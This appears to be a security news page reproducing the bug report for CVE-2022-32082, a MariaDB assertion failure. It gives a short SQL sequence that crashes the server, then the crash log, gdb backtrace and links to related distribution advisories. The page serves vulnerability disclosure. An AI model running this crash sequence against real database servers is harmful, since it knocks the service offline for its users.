Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-32082: [MDEV-26433] assertion: table->get_ref_count() == 0 in dict0dict.cc line 1915

MariaDB v10.5 to v10.7 was discovered to contain an assertion failure at table->get_ref_count() == 0 in dict0dict.cc.

CVE
Open in Source
#sql

step to reproduce:

CREATE TEMPORARY TABLE v0 ( v1 TEXT ( 15 ) CHAR SET BINARY NOT NULL NOT NULL UNIQUE CHECK ( v1 ) ) REPLACE SELECT NULL AS v3 , 74 AS v2 ;

SELECT SQL_CALC_FOUND_ROWS * FROM v0 WHERE v1 IN ( SELECT v3 FROM v0 ) LIMIT 16 ;

DROP PROCEDURE v0 ;

CREATE TABLE v4 ( v6 INT , v5 INT DEFAULT 27 ) ;

ROLLBACK TO SAVEPOINT v4 ;

INSERT INTO v4 VALUES ( + 84 , + 32 , 48 ) ;

report (compiled with ASAN):

Server version: 10.7.0-MariaDB

key_buffer_size=134217728

read_buffer_size=131072

max_used_connections=1

max_threads=153

thread_count=1

It is possible that mysqld could use up to

key_buffer_size + (read_buffer_size + sort_buffer_size)*max_threads = 467956 K bytes of memory

Hope that’s ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong…

stack_bottom = 0x7fb65ba7c850 thread_stack 0x5fc00

sanitizer_common/sanitizer_common_interceptors.inc:4203(__interceptor_backtrace.part.0)[0x7fb67b328c3e]

mysys/stacktrace.c:213(my_print_stacktrace)[0x55df46af9747]

sql/signal_handler.cc:222(handle_fatal_signal)[0x55df45ac1120]

sigaction.c:0(__restore_rt)[0x7fb67ad12870]

:0(__GI_raise)[0x7fb67a7f1d22]

:0(__GI_abort)[0x7fb67a7db862]

include/ut0ut.h:319(ib::logger& ib::logger::operator<< <int>(int const&))[0x55df44f00246]

dict/dict0dict.cc:1258(dict_sys_t::evict_table_LRU(bool) [clone .cold])[0x55df44f2296e]

include/dict0dict.h:1578(dict_sys_t::unlock())[0x55df463d955f]

sql/handler.cc:577(hton_drop_table(handlerton*, char const*))[0x55df45ad0145]

sql/temporary_tables.cc:703(THD::rm_temporary_table(handlerton*, char const*))[0x55df4594c2c8]

sql/temporary_tables.cc:1464(THD::free_tmp_table_share(TMP_TABLE_SHARE*, bool))[0x55df4594d237]

sql/temporary_tables.cc:672(THD::drop_temporary_table(TABLE*, bool*, bool))[0x55df459513f5]

sql/sql_insert.cc:5203(select_create::abort_result_set())[0x55df452837f5]

sql/sql_select.cc:563(handle_select(THD*, LEX*, select_result*, unsigned long))[0x55df454f48a5]

sql/sql_table.cc:11732(Sql_cmd_create_table_like::execute(THD*))[0x55df455d8e27]

sql/sql_parse.cc:5997(mysql_execute_command(THD*, bool))[0x55df45359180]

sql/sql_parse.cc:8047(mysql_parse(THD*, char*, unsigned int, Parser_state*))[0x55df453665a1]

sql/sql_parse.cc:1898(dispatch_command(enum_server_command, THD*, char*, unsigned int, bool))[0x55df4536c60c]

sql/sql_parse.cc:1406(do_command(THD*, bool))[0x55df4537173d]

sql/sql_connect.cc:1418(do_handle_one_connection(CONNECT*, bool))[0x55df4572ce57]

sql/sql_connect.cc:1312(handle_one_connection)[0x55df4572d33d]

perfschema/pfs.cc:2204(pfs_spawn_thread)[0x55df461bdc2c]

pthread_create.c:0(start_thread)[0x7fb67ad08259]

:0(__GI___clone)[0x7fb67a8b35e3]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x6290000873d0): CREATE TEMPORARY TABLE v0 ( v1 TEXT ( 15 ) CHAR SET BINARY NOT NULL NOT NULL UNIQUE CHECK ( v1 ) ) REPLACE SELECT NULL AS v3 , 74 AS v2

Connection ID (thread ID): 4

Status: NOT_KILLED

Optimizer switch: index_merge=on,index_merge_union=on,index_merge_sort_union=on,index_merge_intersection=on,index_merge_sort_intersection=off,engine_condition_pushdown=off,index_condition_pushdown=on,derived_merge=on,derived_with_keys=on,firstmatch=on,loosescan=on,materialization=on,in_to_exists=on,semijoin=on,partial_match_rowid_merge=on,partial_match_table_scan=on,subquery_cache=on,mrr=off,mrr_cost_based=off,mrr_sort_keys=off,outer_join_with_cache=on,semijoin_with_cache=on,join_cache_incremental=on,join_cache_hashed=on,join_cache_bka=on,optimize_join_buffer_size=on,table_elimination=on,extended_keys=on,exists_to_in=on,orderby_uses_equalities=on,condition_pushdown_for_derived=on,split_materialized=on,condition_pushdown_for_subquery=on,rowid_filter=on,condition_pushdown_from_having=on,not_null_range_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains

information that should help you find out what is causing the crash.

Writing a core file…

Working directory at /home/fuboat/mariadb-tmp/18

Resource Limits:

Limit Soft Limit Hard Limit Units

Max cpu time unlimited unlimited seconds

Max file size unlimited unlimited bytes

Max data size unlimited unlimited bytes

Max stack size 8388608 unlimited bytes

Max core file size unlimited unlimited bytes

Max resident set unlimited unlimited bytes

Max processes 61608 61608 processes

Max open files 524288 524288 files

Max locked memory 65536 65536 bytes

Max address space unlimited unlimited bytes

Max file locks unlimited unlimited locks

Max pending signals 61608 61608 signals

Max msgqueue size 819200 819200 bytes

Max nice priority 0 0

Max realtime priority 0 0

Max realtime timeout unlimited unlimited us

Core pattern: core

gdb bt:

Using host libthread_db library "/usr/lib/libthread_db.so.1".

Core was generated by `/usr/local/mysql/bin//mysqld --port 10018 --datadir=/home/fuboat/mariadb-tmp/18’.

Program terminated with signal SIGABRT, Aborted.

#0 0x00007fb67ad0f808 in pthread_kill () from /usr/lib/libpthread.so.0

#1 0x000055df45ac106b in handle_fatal_signal (sig=<optimized out>) at /experiment/mariadb-server/sql/signal_handler.cc:344

#2 <signal handler called>

#3 0x00007fb67a7f1d22 in raise () from /usr/lib/libc.so.6

#4 0x00007fb67a7db862 in abort () from /usr/lib/libc.so.6

#5 0x000055df44f00246 in ut_dbg_assertion_failed (expr=expr@entry=0x55df4700bd40 "table->get_ref_count() == 0", file=file@entry=0x55df4700ae60 "/experiment/mariadb-server/storage/innobase/dict/dict0dict.cc", line=line@entry=1890) at /experiment/mariadb-server/storage/innobase/ut/ut0dbg.cc:60

#6 0x000055df44f2296e in dict_sys_t::remove (this=<optimized out>, this@entry=0x55df478238c0 <dict_sys>, table=0x61700003ff08, lru=<optimized out>, lru@entry=false, keep=<optimized out>, keep@entry=true) at /experiment/mariadb-server/storage/innobase/dict/dict0dict.cc:1890

#7 0x000055df463d955f in ha_innobase::delete_table (this=<optimized out>, name=<optimized out>) at /experiment/mariadb-server/storage/innobase/handler/ha_innodb.cc:13360

#8 0x000055df45ad0145 in hton_drop_table (hton=<optimized out>, path=<optimized out>) at /experiment/mariadb-server/sql/handler.cc:576

#9 0x000055df4594c2c8 in THD::rm_temporary_table (this=<optimized out>, base=<optimized out>, path=0x61a000061d48 “/tmp/#sql-temptable-3021ca-4-0”) at /experiment/mariadb-server/sql/temporary_tables.cc:703

#10 0x000055df4594d237 in THD::free_tmp_table_share (this=<optimized out>, share=0x61a000061898, delete_table=<optimized out>) at /experiment/mariadb-server/sql/temporary_tables.cc:1462

#11 0x000055df459513f5 in THD::drop_temporary_table (this=0x62b0000bd218, table=<optimized out>, is_trans=is_trans@entry=0x0, delete_table=delete_table@entry=true) at /experiment/mariadb-server/sql/temporary_tables.cc:669

#12 0x000055df451da338 in drop_open_table (thd=<optimized out>, table=<optimized out>, db_name=<optimized out>, table_name=<optimized out>) at /experiment/mariadb-server/sql/sql_base.cc:1355

#13 0x000055df452837f5 in select_create::abort_result_set (this=0x6290000890c8) at /experiment/mariadb-server/sql/sql_insert.cc:5202

#14 0x000055df454f48a5 in handle_select (thd=thd@entry=0x62b0000bd218, lex=lex@entry=0x62b0000c12f8, result=result@entry=0x6290000890c8, setup_tables_done_option=setup_tables_done_option@entry=0) at /experiment/mariadb-server/sql/sql_select.cc:563

#15 0x000055df455d8e27 in Sql_cmd_create_table_like::execute (this=<optimized out>, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql_table.cc:11732

#16 0x000055df45359180 in mysql_execute_command (thd=0x62b0000bd218, is_called_from_prepared_stmt=<optimized out>) at /experiment/mariadb-server/sql/sql_parse.cc:5997

#17 0x000055df453665a1 in mysql_parse (thd=0x62b0000bd218, rawbuf=<optimized out>, length=<optimized out>, parser_state=<optimized out>) at /experiment/mariadb-server/sql/sql_parse.cc:8030

#18 0x000055df4536c60c in dispatch_command (command=<optimized out>, thd=0x62b0000bd218, packet=<optimized out>, packet_length=<optimized out>, blocking=<optimized out>) at /experiment/mariadb-server/sql/sql_parse.cc:1896

#19 0x000055df4537173d in do_command (thd=0x62b0000bd218, blocking=blocking@entry=true) at /experiment/mariadb-server/sql/sql_parse.cc:1404

#20 0x000055df4572ce57 in do_handle_one_connection (connect=<optimized out>, put_in_cache=<optimized out>) at /experiment/mariadb-server/sql/sql_connect.cc:1418

#21 0x000055df4572d33d in handle_one_connection (arg=arg@entry=0x6080000023b8) at /experiment/mariadb-server/sql/sql_connect.cc:1312

#22 0x000055df461bdc2c in pfs_spawn_thread (arg=0x617000005b98) at /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

#23 0x00007fb67ad08259 in start_thread () from /usr/lib/libpthread.so.0

#24 0x00007fb67a8b35e3 in clone () from /usr/lib/libc.so.6

Related news

Gentoo Linux Security Advisory 202405-25

Gentoo Linux Security Advisory 202405-25 - Multiple vulnerabilities have been discovered in MariaDB, the worst fo which can lead to arbitrary execution of code. Versions greater than or equal to 10.11.3:10.11 are affected.

Red Hat Security Advisory 2023-7633-01

Red Hat Security Advisory 2023-7633-01 - An update for rh-mariadb105-galera and rh-mariadb105-mariadb is now available for Red Hat Software Collections. Issues addressed include a null pointer vulnerability.

Red Hat Security Advisory 2023-5684-01

Red Hat Security Advisory 2023-5684-01 - MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. Issues addressed include a null pointer vulnerability.

Red Hat Security Advisory 2023-5683-01

Red Hat Security Advisory 2023-5683-01 - MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. Issues addressed include a null pointer vulnerability.

Ubuntu Security Notice USN-5739-1

Ubuntu Security Notice 5739-1 - Several security issues were discovered in MariaDB and this update includes new upstream MariaDB versions to fix these issues. MariaDB has been updated to 10.3.37 in Ubuntu 20.04 LTS and to 10.6.11 in Ubuntu 22.04 LTS and Ubuntu 22.10. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE